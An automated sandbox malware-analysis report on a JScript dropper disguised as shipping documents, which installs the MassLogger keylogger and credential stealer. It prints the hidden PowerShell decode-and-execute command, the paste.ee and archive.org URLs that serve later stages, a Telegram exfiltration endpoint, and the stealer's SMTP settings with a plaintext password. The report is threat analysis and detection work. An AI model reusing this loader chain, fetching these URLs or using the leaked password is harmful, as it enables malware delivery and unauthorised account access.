
Windows Analysis Report
Shipping Documents SI 694_pdf.js

Overview

General Information

Sample name: Shipping Documents SI 694_pdf.js
Analysis ID: 1676212
MD5: e822f6aa3570eb13de7cd31d07d8cca0
SHA1: 36ec5a917df2a8c21fc775c25565b60d0d99da5b
SHA256: 67182a912dd8c9f738c203e4f666b3136dbe24239d1278e292155629a26a135c
Tags: js, user-abuse_ch

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Joe Sandbox ML detected suspicious sample
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Levels: clean, suspicious, malicious]
  • System is w10x64
  • wscript.exe (PID: 7148 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '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' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($fronts));Invoke-Expression $allocryptic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 6720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
{
  "EXfil Mode": "SMTP",
  "From": "hee@dermypack.com.my",
  "Password": "Hee@123456789!",
  "Server": "mail.dermypack.com.my"
}
Source | Rule | Description | Author | Strings
0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security |
0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0xefdf:$a1: get_encryptedPassword
  • 0xf307:$a2: get_encryptedUsername
  • 0xed7a:$a3: get_timePasswordChanged
  • 0xee9b:$a4: get_passwordField
  • 0xeff5:$a5: set_encryptedPassword
  • 0x10951:$a7: get_logins
  • 0x10602:$a8: GetOutlookPasswords
  • 0x103f4:$a9: StartKeylogger
  • 0x108a1:$a10: KeyLoggerEventArgs
  • 0x10451:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
10.2.powershell.exe.1e8a1e165d0.1.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
10.2.powershell.exe.1e8a1e165d0.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
10.2.powershell.exe.1e8a1e165d0.1.unpack | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security |
10.2.powershell.exe.1e8a1e165d0.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
10.2.powershell.exe.1e8a1e165d0.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0xd3df:$a1: get_encryptedPassword
  • 0xd707:$a2: get_encryptedUsername
  • 0xd17a:$a3: get_timePasswordChanged
  • 0xd29b:$a4: get_passwordField
  • 0xd3f5:$a5: set_encryptedPassword
  • 0xed51:$a7: get_logins
  • 0xea02:$a8: GetOutlookPasswords
  • 0xe7f4:$a9: StartKeylogger
  • 0xeca1:$a10: KeyLoggerEventArgs
  • 0xe851:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
amsi64_6852.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_6852.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

                      System Summary

                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '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' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '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' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '[Base64-encoded PowerShell payload omitted]' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Network Connection, Author: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7148, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49685
                      Source: Network Connection, Author: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6720, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49696
                      Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine|base64offset|contains: ., Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", ProcessId: 7148, ProcessName: wscript.exe
                      Source: Network Connection, Author: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7148, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49685
                      Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '[Base64-encoded PowerShell payload omitted]' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine|base64offset|contains: ., Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", ProcessId: 7148, ProcessName: wscript.exe
                      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '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' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2025-04-28T13:24:09.806195+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49686 | 23.186.113.60 | 443 | TCP
                      2025-04-28T13:24:38.653437+0200 | 2057635 | 1 | A Network Trojan was detected | 23.186.113.60 | 443 | 192.168.2.6 | 49695 | TCP
                      2025-04-28T13:24:37.141219+0200 | 2049038 | 1 | A Network Trojan was detected | 207.241.233.30 | 443 | 192.168.2.6 | 49694 | TCP
                      2025-04-28T13:24:39.587683+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49696 | 158.101.44.242 | 80 | TCP
                      2025-04-28T13:24:38.653437+0200 | 2858295 | 1 | A Network Trojan was detected | 23.186.113.60 | 443 | 192.168.2.6 | 49695 | TCP
                      2025-04-28T13:24:38.345893+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49695 | 23.186.113.60 | 443 | TCP


                      AV Detection

                      Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "hee@dermypack.com.my", "Password": "Hee@123456789!", "Server": "mail.dermypack.com.my"}
                      Source: Shipping Documents SI 694_pdf.js, ReversingLabs: Detection: 13%
                      Source: Submitted Sample, Neural Call Log Analysis: 99.9%

                      Location Tracking

                      Source: unknown, DNS query: name: reallyfreegeoip.org

                      Exploits

                      Source: Yara match, File source: 10.2.powershell.exe.1e8aa30fb3d.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 10.2.powershell.exe.1e8a2e670c8.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 10.2.powershell.exe.1e8aa250000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 10.2.powershell.exe.1e8aa250000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49697 version: TLS 1.0
                      Source: unknown, HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49686 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.6:49693 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.6:49694 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49695 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 00007FF88A8AB913h 10_2_00007FF88A8AB8A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 00007FF88A8AB913h 10_2_00007FF88A8AB8B9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp 026B9731h 12_2_026B9480
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp 026B9E5Ah 12_2_026B9A40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp 026B9E5Ah 12_2_026B9A30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp 026B9E5Ah 12_2_026B9D87

                      Networking

                      Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.233.30:443 -> 192.168.2.6:49694
                      Source: Network traffic Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 23.186.113.60:443 -> 192.168.2.6:49695
                      Source: Network traffic Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.186.113.60:443 -> 192.168.2.6:49695
                      Source: C:\Windows\System32\wscript.exe Network Connect: 23.186.113.60 443
                      Source: unknown DNS query: name: paste.ee
                      Source: Shipping Documents SI 694_pdf.js Return value : ['"http://paste.ee/d/fa7OMk20/0"']
                      Source: Shipping Documents SI 694_pdf.js Return value : [',send,', '"send"']
                      Source: Shipping Documents SI 694_pdf.js Argument value : ['"GET","http://paste.ee/d/fa7OMk20/0",false']
                      Source: global traffic HTTP traffic detected: GET /d/xZVSQx4S/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /xml/173.244.56.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                      Source: Joe Sandbox View IP Address: 23.186.113.60
                      Source: Joe Sandbox View IP Address: 104.21.112.1
                      Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknown DNS query: name: checkip.dyndns.org
                      Source: unknown DNS query: name: reallyfreegeoip.org
                      Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49686 -> 23.186.113.60:443
                      Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49696 -> 158.101.44.242:80
                      Source: Network traffic Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49695 -> 23.186.113.60:443
                      Source: global traffic HTTP traffic detected: GET /d/fa7OMk20/0 HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
                      Source: global traffic HTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1 User-Agent: Mozilla/5.0 Host: archive.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1 User-Agent: Mozilla/5.0 Host: ia801700.us.archive.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /d/fa7OMk20/0 HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                      Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49697 version: TLS 1.0
                      Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: */* If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
                      Source: global traffic DNS traffic detected: DNS query: paste.ee
                      Source: global traffic DNS traffic detected: DNS query: c.pki.goog
                      Source: global traffic DNS traffic detected: DNS query: archive.org
                      Source: global traffic DNS traffic detected: DNS query: ia801700.us.archive.org
                      Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comd
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002876000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/d
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgd
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://paste.ee
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgd
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://archive.org
                      Source: powershell.exe, 0000000A.00000002.1577845542.000001E8A9D3F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://archive.org/
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1577845542.000001E8A9D0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://archive.org/download/new_image_20250413/new_image.jpg
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891F8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia801700.us.archive.org
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891F8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/xZVSQx4S/0
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
